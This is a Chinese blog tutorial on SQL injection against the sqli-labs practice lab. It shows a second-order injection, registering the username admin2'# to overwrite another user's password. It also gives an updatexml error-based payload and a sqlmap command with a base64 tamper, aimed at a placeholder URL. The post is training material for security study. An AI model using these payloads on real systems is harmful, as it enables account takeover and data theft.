首页 > 数据库 >SQL注入-二次注入

SQL注入-二次注入

时间:2023-02-04 20:37:05浏览次数:64  
标签:二次 admin1 admin3 admin2 admin4 SQL +----+----------+------------+ 注入

SQL注入-二次注入-dnslog注入

二次注入

二次注入一般是用于白盒测试、黑盒测试就算是找到注入也没办法攻击。

image.png

使用sqlilabs-less24-post登陆框&二次注入演示

在原来数据库中:

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | 111111     |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 15 | admin'#  | 123456     |
+----+----------+------------+
14 rows in set (0.00 sec)

我们可以利用二次注入来更改admin2的密码

1649058368020

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | 111111     |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 15 | admin'#  | 123456     |
| 16 | admin2'# | 123456     |
+----+----------+------------+
15 rows in set (0.00 sec)

使用admin2‘#账号登录

1649058461658

更改admin2‘#的密码为 111111 ,这里会把admin2的密码改掉为 111111 ,admin2'#的密码不变

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | stupid   | stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | 111111     |
|  9 | admin1   | admin1     |
| 10 | admin2   | 111111     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 15 | admin'#  | 123456     |
| 16 | admin2'# | 123456     |
+----+----------+------------+
15 rows in set (0.00 sec)

在源码中:

1649058617161

我们执行修改admin2'# 的密码时,这里的语句变成

$sql = "UPDATE users SET PASSWORD='$pass' where username='admin2'#' and password='$curr_pass' ";

后面的#注释掉后面的语句等效于

$sql = "UPDATE users SET PASSWORD='$pass' where username='admin2'

直接把admin2的密码修改成为 我们输入的密码

我们可以使用admin2'or updatexml(1,concat(0x7e,database(),0x7e),0) or'注册,二次注入得到我们想要的信息

二次注入只有在我们知道源码的语句时才能使用

dnslog注入

涉及资源:http://ceye.io

参考资料:https://www.cnblogs.com/xhds/p/12322839.html

中转注入

一个Base64的注入点 ,手工注入太麻烦,有sqlmap Base64注入的方法

sqlmap -u http://xxxx.com/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs

--tamper 明确告诉sqlmap使用base64对注入的参数进行编码

其他插件,可以自己扩展,在tamper文件夹下面

encodes编码 ——charencode.py
base64编码 —— base64encode.py

自己编写:创建一个text.php文件在本机网站根目录

1649062197416

这里读取请求中的 x ,对其进行base64编码 ,再使用file_get_contents得到返回的结果(先拼接)

1649062048700

使用sqlmap,对 text.php ?x=

asdf

标签:二次,admin1,admin3,admin2,admin4,SQL,+----+----------+------------+,注入
From: https://www.cnblogs.com/crabin/p/17092308.html

相关文章

  • SQL注入-waf绕过
    SQL注入-waf绕过网络资源https://www.cnblogs.com/cute-puli/p/11146625.htmlhttps://www.cnblogs.com/r00tgrok/p/SQL_Injection_Bypassing_WAF_And_Evasion_Of_Filte......
  • SQL注入-SQLmap-不同数据库注入
    SQL注入-不同数据库注入-注入工具的使用简要学习各种数据库的注入特点access,mysql,mssql,mongoDB,postgresql,sqlite,oracle,sybase等1.access注入Access数据库......
  • SQL注入
    SQL注入简单Sqli-labs/Less-2演示信息收集我们使用ubantu搭建Sqli-labs靶场安装:参考博客https://blog.csdn.net/han123456o/article/details/107822333确定注入源:......
  • SQL注入- 堆叠注入
    SQL注入-堆叠注入1.堆叠查询注入​ stackedinjections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mys......
  • SQLMAP使用
    sqlmap使用教程-u指定目标URL(可以是http协议也可以是https协议)-d连接数据库--dbs列出所有的数据库--current-db列出当前数据库--tables列出当前的表--column......
  • SQLGetShell
    SQLGetShell利用sql注入来上传我们的木马后门,连接得到服务器shell确定注入点得到网站目录user='andupdatexml(1,concat(0x7e,@@basedir,0x7e),0)--+&password=asdf&......
  • axios二次封装,mock前端模拟后端接口
    axios二次封装封装request,然后不用每次遇到接口就使用axios进行调用接口。封装一个基地址,然后每次调用接口的时候,只用写出来自己的函数方法就好。我们基于脚手架进行封装......
  • Qt中QSqlQueryModel对应的表格进行自动排序功能
    Qt中使用了自己的机制来避免使用SQL语句,为我们提供了更简单的数据库操作及数据显示模型,分别是只读的QSqlQueryModel,操作单表的QSqlTableModel和以及可以支持外键的QSqlRela......
  • P3基础篇-02.初识Redis-认识NoSQL
    Sql和NoSql的区别SQL(StructuredQueryLanguage):关系型数据库NoSql(NoStructuredQueryLanguage):非关系性数据库常见NoSql数据库:键值型数据库(Redis)文档型数据......
  • 《SQL基础》09. 事务
    目录事务简介操作方式一方式二四大特性(ACID)并发事务问题事务隔离级别事务简介事务是一组操作的集合,它是一个不可分割的工作单位。事务会把所有的操作作为一个整体一起......